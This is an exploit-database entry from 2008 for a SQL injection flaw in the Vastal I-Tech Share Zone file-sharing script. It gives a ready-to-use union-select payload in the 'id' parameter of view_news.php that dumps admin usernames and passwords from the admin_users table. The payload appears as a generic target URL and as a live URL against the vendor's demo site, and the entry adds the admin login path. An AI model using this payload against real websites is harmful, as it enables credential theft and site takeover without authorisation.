Vastal I-Tech Share Zone (id) SQL Injection Vulnerability

2008-09-05T00:00:00
ID 1337DAY-ID-3605
Type zdt
Reporter DeViL iRaQ
Modified 2008-09-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Vastal I-Tech Share Zone (id) SQL Injection Vulnerability
=========================================================


#######################################################
# Vastal I-Tech Share Zone ( id ) SQL Injection Vulnerability
#
# Author   : DeViL iRaQ
#
# Price     : $200.00
#
# Script Home Page : http://www.vastal.com/share-zone-the-file-sharing-software.html
#
# Demo      : http://www.vastal.com/rapid/
#
# Dork      : N/A
########################################################
# Exploit :
# www.[sitename].com/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
#
# Live Demo:
# http://www.vastal.com/rapid/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
#
# Admin login :
# http://www.[sitename].com/admin/
#########################################################




#  0day.today [2018-03-20]  #